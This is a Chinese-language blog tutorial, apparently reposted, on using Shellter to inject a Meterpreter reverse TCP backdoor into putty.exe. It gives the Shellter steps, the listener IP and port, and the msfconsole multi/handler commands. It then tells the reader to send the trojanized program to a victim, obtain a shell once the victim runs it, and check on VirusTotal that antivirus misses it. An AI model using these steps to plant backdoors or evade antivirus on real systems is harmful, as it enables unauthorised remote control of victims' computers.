Linux_Kali

利用shellter实现对远程机的免杀后门控制

字号+ 作者:红黑联盟 来源:转载 2017-07-04 09:01 我要评论( )

Shellter是一款动态shellcode注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看看,如何使用该工具。......

  Shellter是一款动态shellcode注入工具。利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安全工具的检查。下面我们来看看,如何使用该工具。

  首先,我们先来下载该程序。

  这是一个Zip的压缩包,我们利用 unzip 命令进行解压。解压后我们进入该目录文件。并设置我们需要的本地shellter类型。因为是用Windows程序进行绑定,因此我们的类型设置成 wineconsole shellter 。

  wineconsole shellter

利用shellter实现对远程机的免杀后门控制

  当我们回车后,接下来的界面会让我们选择操作模式。我们选择自动就行了。我们输入 a 。

利用shellter实现对远程机的免杀后门控制

  下面,我们选择一个可执行文件,并将其拷贝到 shellter 文件夹下。让它和文件夹下的 shellter.exe 进行绑定。我拷贝的是 putty.exe 程序。这里一定要是可执行文件,才能进行绑定。

利用shellter实现对远程机的免杀后门控制

  当我们做好以上操作,我们回到shellter终端。这里要求我们选择一个 绑定目标。我们就填 putty.exe 这样,他就会开始进行绑定。

利用shellter实现对远程机的免杀后门控制

  当进程被成功绑定后,这里会列出一些关于payload的选项,要求我们选择一种 payload 类型,进行后续的攻击操作。这里我选择

  1 Meterpreter_reverse_tcp

利用shellter实现对远程机的免杀后门控制

  这里要求我们进行一些 payload 的基本配置。

  LHOST:192.168.0.125 Kali的IP。

  LPORT: 7777 监听端口。

利用shellter实现对远程机的免杀后门控制

  配置成功后,我们会得到一个verified的确认,表示注入配置成功。我们回车继续操作。

利用shellter实现对远程机的免杀后门控制

  现在我们要做的是,配置一个用来处理反弹连接的侦听器。我们打开 MSF 。

  msfconsole

  use exploit/multi/handler

  set payload windows/meterpreter/reverse_tcp

  set lhost 192.168.0.125

  set lport 7777

  exploit

  做好这步,接下来要做的就是,将植入了后门的程序发送给攻击对象,此时只要受害者打开该执行程序,我们就成功获得了shell 。可以看到对方是 win7 的操作系统 x86架构等信息。

利用shellter实现对远程机的免杀后门控制

  我们在 virustotal.com 网站上进行模拟安全扫描,进行病毒检测,我们看到杀毒软件并没有扫到病毒存在。这说明,我们成功绕过了杀毒软件。

利用shellter实现对远程机的免杀后门控制


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Linux_Kali/637.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~